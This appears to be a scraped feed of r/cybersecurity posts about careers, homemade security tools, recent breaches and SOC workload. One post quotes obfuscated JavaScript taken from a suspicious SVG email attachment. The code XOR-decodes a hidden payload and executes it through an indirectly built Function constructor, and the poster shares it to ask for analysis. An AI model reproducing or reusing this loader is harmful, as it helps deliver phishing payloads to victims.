cybersecurity


This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.

26
 
 
The original post: /r/cybersecurity by /u/Brown_jamun on 2025-07-02 14:19:10.

I have been working for the past 4 years in SOC-Azure, using Sentinel and Microsoft Defender for Endpoint (MDE) in my daily tasks. However, after speaking with my senior, I’ve realized that the scope is limited in cloud security.

I’m planning to transition into a different domain—preferably Red Team or another cutting-edge area that keeps me within the cybersecurity field, but in a more lucrative and interesting role. My priority is to enjoy the work I do. SOC work is very repetitive and shift-based. While I’m okay with working night shifts, the constant rotation is impacting my health and doesn’t seem sustainable in the long term.

What roles should I consider next? What technologies should I learn to make this switch into a more exciting role? A clear pathway would be very helpful.

I’m based in India. My current company feels like a dream job in terms of WFH flexibility and free time—but I’m no longer interested in the work. The pay is just enough to cover my bills.

Any suggestions from experienced folks? Should I stay in SOC but change my domain? If so, what should be my next course of action? Thanks again for reading this.

27
 
 
The original post: /r/cybersecurity by /u/Big-Salamander-1522 on 2025-07-02 13:42:52.

Hey everyone — over the last 2 weeks I’ve built and published 3 security-focused tools:

  • Cryptography CLI toolkit (AES, RSA, SHA256)
  • Cybersecurity GUI tools (logging, hashing, encoding)
  • Web App Pentesting Walkthrough Pack (XSS, SQLi, CSRF, IDOR, etc.)

All are open source and now public at: github.com/Zerokeylabs

They’ve gotten 1,000+ views in 15 hours across Reddit subs and 48+ GitHub clones.

🧠 I’m now looking to:

  • Connect with other indie security builders or engineers
  • Join a Discord server where people share ideas, tools, or even pay to build secure stuff

I don’t want to cold-DM anyone or post in the wrong place, so if anyone knows where good discussions or collabs happen, I’d truly appreciate the direction.

Happy to return feedback or contribute to anything in the open.

Cheers 🙌

Update: This post just hit 482+ views in 1 hour, with majority from the US & UK — and it’s now marked “#1 of all time” on my Reddit by insights.

Still looking for Discords with founders or builders where security tools get shared/tested.

I build crypto, pentesting, and cybersec tools. Happy to contribute or help in return.

🔄 Small milestone update: Crossed 1,200+ views and 500+ US viewers on this post.

Appreciate everyone who checked out the tools — if you're building something in crypto, SaaS, or security and want help reviewing or securing it, I'm open to collabs. Grateful for the interest - didn’t expect this much visibility in such a short time.

You can find the tools here: https://github.com/Zerokeylabs

28
 
 
The original post: /r/cybersecurity by /u/Desperate_Bath7342 on 2025-07-02 13:40:39.

I have decent experience in DAST and whitebox security testing, and now I am switching to learn SAST. What are the coding experience expectations to excel in SAST? I had good exposure to coding in college and some small projects, but no real experience in my professional journey.

29
 
 
The original post: /r/cybersecurity by /u/Desperate_Bath7342 on 2025-07-02 13:30:41.

In my appsec journey, I have switched to a role which just involves retest/rescan of issues reported during SAST/DAST, unlike the full-blown whitebox sec testing I have always done in my career. How can I circumvent this hindrance in my career? I don't have access to many tools apart from Veracode and AppScan.

30
 
 
The original post: /r/cybersecurity by /u/Fluffy_White_Bunny on 2025-07-02 13:23:13.

Recently my inbox has had suspicious emails that contain SVG files and no text at all. I managed to open the file and view its code in Notepad. I can only guess it’s malicious, but can anyone figure out what the code below does?

S = 'xxxxxx'; (() => { const i = "bdd65fd0865d8e48898806a4", j = "150d0a525a114a5c57555410510a5a16504b5d5e100b4155160b061e55072c62581d12545b2d13131a740e74121d434d5a1d461d55043057581d12505a571313585a4d62501d015a340e041d123f09091f1d121174081313586f4274501d46042452431d55373254581d5529593254131a77086e121d46042055431d552b1e7e581d122b620c13131a01531a191d320f"; const u = j.match(/.{2}/g), T = []; for (let B = 0; B < u.length; B++) { T.push(String.fromCharCode(parseInt(u[B], 16) ^ i.charCodeAt(B % i.length))); } const s = T.join(''); const A = { toString: () => { const r = [][ [115,111,109,101].map(y => String.fromCharCode(y)).join('') ][ [99,111,110,115,116,114,117,99,116,111,114].map(y => String.fromCharCode(y)).join('') ]; return r(s)(), 1; } }; A + ''; })(); ]]>

31
 
 
The original post: /r/cybersecurity by /u/BedNo8883 on 2025-07-02 12:02:10.

Let me add some context to this.

We have a disastrous remote work policy that pretty much allows any user to work anywhere, with the only caveat being if they travel internationally they can’t be there for more than 30 days.

So, it came down from above that if users travel internationally they have to submit a ticket to the SOC so that we can notate their travel. We started doing this because we’d see sign-in activity and then reach out to a manager to see if they were supposed to be there.

This has become…overwhelming…. We now get 100s of travel tickets a month…

I have to go through these and document every person and then refer back to it if I see sign-in logs for them. If I don’t it’s an email to the manager.

I’m trying to work with my team to automate this but it’s been slow going.

Where I’m at is my first SOC job and I’m not sure if this is normal or completely bonkers.

32
 
 
The original post: /r/cybersecurity by /u/Excellent_Analysis65 on 2025-07-02 11:47:03.
33
 
 
The original post: /r/cybersecurity by /u/im_guru on 2025-07-02 10:33:51.
34
 
 
The original post: /r/cybersecurity by /u/Defiant_Variety4453 on 2025-07-02 09:38:37.

Could you guys recommend adequate learning materials for junior cyber security engineers? My personal request would be focused on Azure. Thank you.

35
 
 
The original post: /r/cybersecurity by /u/Mindless_Pension_786 on 2025-07-02 08:16:21.

Hi

I have created a password generator tool that is customizable and does not save any personal details - it is not meant to assist in retrieving your password but in generating a strong one. Possible addition of local storage, but the use case for a shared PC is not advisable.

https://passfader.com/

36
 
 
The original post: /r/cybersecurity by /u/NickyK01 on 2025-07-02 07:59:32.

This is a pretty big challenge for a lot of organizations, including ours. Scams these days are getting incredibly sophisticated, way beyond just obvious phishing emails with typos. Attackers are using really clever social engineering tactics, making it super hard for anyone, especially non-technical staff, to tell what's legitimate and what's not. They're often the first point of contact for these things, which puts a huge amount of pressure on them and on our security.

We run training, of course, but it sometimes feels like we're always playing catch-up, and it's tough to make the material truly stick and be effective against constantly evolving threats. What methods or approaches have you found genuinely work to empower your non-technical teams to spot those subtle, high-level scams before they become a problem? Thanks for any ideas!

37
 
 
The original post: /r/cybersecurity by /u/Narrow-Sir300 on 2025-07-02 06:56:57.

Hi! I am an experienced InfoSec specialist with senior roles in leading SaaS companies, Big4 and so on. Over 7 years in the field, holding good experience and certifications such as CISM, ISO27001 LA-LI, NIS2 Mgmt, ISO22301 LA, and experience with GRC, audits, security awareness, XDR tools and cloud security, mainly Azure (Entra ID, Purview).

I do not speak Danish, so I will look more at international companies…

So, what can I expect? In terms of salaries:

  • DKK gross salary and net after taxes, because I saw some controversy and I’d like to hear your feedback.

Txs ❤️🫡

38
 
 
The original post: /r/cybersecurity by /u/OutrageousComputer63 on 2025-07-01 22:56:58.

Hey everyone, I’m a web developer and have been working on a website that allows website owners to put their URL into the website and check their website for vulnerabilities. I’m making sure no one can abuse this website by making website owners include a meta tag with a random code in their code to make sure they own the website. I am also limiting scans to one per hour for each IP address to prevent further abuse. What do you think of this idea? Would you pay to use it, or is it even practical? Please give me any feedback, as I don’t have a huge background in cyber security and want to make sure I’m making the website as secure and safe as possible.

39
 
 
The original post: /r/cybersecurity by /u/OkShare735 on 2025-07-01 20:32:07.

Hey all,

So I got tired of doing the usual recon dance: Subfinder → httpx → ports → screenshots → Nuclei → copy-paste results manually.

I ended up building a small tool for myself that just takes a domain, enumerates subdomains, checks open ports, fingerprints tech, takes screenshots, and gives me a JSON and HTML report.

I'm still improving it, but it's already saving me time when doing quick bug bounty sweeps or external pentests.

Here’s a sample output:

  • 12 subdomains found

  • 8 active web services

  • Tech stack: Nginx, WordPress, PHP 8.1

  • Some missing headers / info disclosures flagged

  • Screenshots auto-captured

  • Final report: JSON + HTML, sorted by subdomain → service → tech → potential vuln

I'm not here to promo anything — just wondering:

  • Would this help in your recon workflow?

  • Or is this kind of automation already overdone?

  • Anything you’d want *added* that would actually make this valuable?

Happy to share the repo if anyone’s curious — just trying not to trigger automods by linking directly.

Cheers.

40
 
 
The original post: /r/cybersecurity by /u/Legal-Zi on 2025-07-01 20:29:17.

Hi everyone 👋 I’m a law student at Jamia Millia Islamia, currently working on a research project exploring how women in South-East Delhi are affected by cybercrimes—from online harassment and blackmail to identity theft and stalking.

To better understand this issue, I’m looking to speak with:

  • Women who have faced online abuse (you can stay completely anonymous)
  • Lawyers, NGO workers, social workers, or journalists who have worked on such cases
  • Anyone who can share real-life insights or connect me with someone relevant

Your story or expertise can genuinely help raise awareness and push for better legal protections. Even a small lead or quick chat would mean a lot.

➡️ If you're open to helping—or know someone who might be—please DM me. Everything will be handled with complete sensitivity and confidentiality.

Thanks in advance for your support 🙏

41
 
 
The original post: /r/cybersecurity by /u/nawafaljahdal1 on 2025-07-01 19:55:27.

Hello everyone,

I'm currently going through the Boss of the SOC (BOTS) challenges on CyberDefenders.org, and I’m looking for any available write-ups, detection strategies, or Splunk queries related to the following versions:

  • Boss of the SOC v1
  • Boss of the SOC v2
  • Boss of the SOC v3

These challenges are a great way to improve skills in:

  • Threat Hunting

  • Log Analysis

  • Incident Response

  • Detection Engineering

  • SIEM Operations (especially Splunk)

If you’ve published or know of any:

  • GitHub repos with notes or queries

  • Blog posts with explanations

  • Detection rules or dashboard setups

  • Lessons learned or tips per question

Please share them here!

Let’s make this post a reference hub for anyone tackling these labs and trying to build their Blue Team skills.

Thanks in advance, and happy hunting 🕵️‍♂️🔍


Keywords:

Splunk | Boss of the SOC | CyberDefenders | SOC Analyst | Threat Detection | Blue Team | SIEM | Write-Ups | Detection Engineering | Log Analysis | Incident Response

42
 
 
The original post: /r/cybersecurity by /u/Substantial-Fox1577 on 2025-07-01 19:41:31.

Hey everyone,

I'm planning to transition into cybersecurity freelancing over the next 1–2 years and eventually run my own thing. I've got 15+ years of experience across different areas of cyber, including Red Teaming, Incident Response, GRC, CISO advisory, and Security Operations.

As I prepare for this move, I’d love to hear from others who’ve taken the freelancing route:

  • Which cybersecurity roles or skill sets are in the highest demand for freelancers?
  • Which ones tend to pay better or offer more steady project work?
  • Are there specific niches or certifications that help land clients more easily (especially internationally)? I already have the common ones - CISSP, CISM, CISA, OSCP, GPEN, GCFA, GCIH

I’m open to focusing more on one area if it gives me a better shot at being successful on my own. Curious to hear what’s working for others out there, your advice, experiences, or even lessons learned.

Thanks in advance!

43
1
Qantas Cyber Incident (www.qantasnewsroom.com.au)
 
 
The original post: /r/cybersecurity by /u/baty0man_ on 2025-07-02 04:18:50.
44
 
 
The original post: /r/cybersecurity by /u/Any-Opposite-241 on 2025-07-02 01:59:46.

Hey everyone. I just passed Sec+ last week and was thinking about what to get next. My ultimate goal is to get OSCP and be on the red team. I was thinking eJPT -> CEH -> OSCP? My background is in software development. Been doing it for 5 years now. Any advice would be greatly appreciated.

45
 
 
The original post: /r/cybersecurity by /u/CatfishEnchiladas on 2025-07-02 01:29:34.

The Arizona Secretary of State's Office reported a temporary outage of its Candidate Portal due to a detected cyberattack, although the statewide voter registration database remained unharmed. Secretary of State Adrian Fontes emphasized the growing threats to election infrastructure and commended the state's cybersecurity teams for their prompt actions while ensuring candidates could still file necessary documents.

46
 
 
The original post: /r/cybersecurity by /u/cybersecurity on 2025-07-02 01:17:24.
47
 
 
The original post: /r/cybersecurity by /u/MichaelSanders19 on 2025-07-02 00:42:14.

Qantas Airlines has been breached in a cyber incident disclosed on their website. Interesting timing considering the FBI announcement on Scattered Spider targeting airlines.

48
 
 
The original post: /r/cybersecurity by /u/gdnwsrex on 2025-07-01 23:58:42.

Welcome to r/SaaSDevHub, the community for all things tech and SaaS!

✅ Are you a developer, designer, product manager, founder, or tech enthusiast? This is your hub.

✅ Share what you’re building.

✅ Discuss tech stacks, APIs, scaling challenges, and best practices.

✅ Find collaborators, cofounders, or feedback.

✅ Learn from others in the SaaS and tech space.

Choose your user flair to showcase your role. Let’s build better SaaS together.

49
 
 
The original post: /r/cybersecurity by /u/Smooth-Breadfruit362 on 2025-07-01 23:24:57.

Mosaic joins TMH and Union Health. Oracle has yet to disclose how attacker obtained credentials to access PHI for "many health care organizations nationwide..." https://www.beckershospitalreview.com/healthcare-information-technology/ehrs/oracle-health-data-breach-affects-missouri-health-system/

50
 
 
The original post: /r/cybersecurity by /u/causeimcloudy on 2025-07-01 21:47:03.

I am looking for some ideas of other things to automate in my Org and I would love to get an idea of what tasks other people wish were automated but are not.
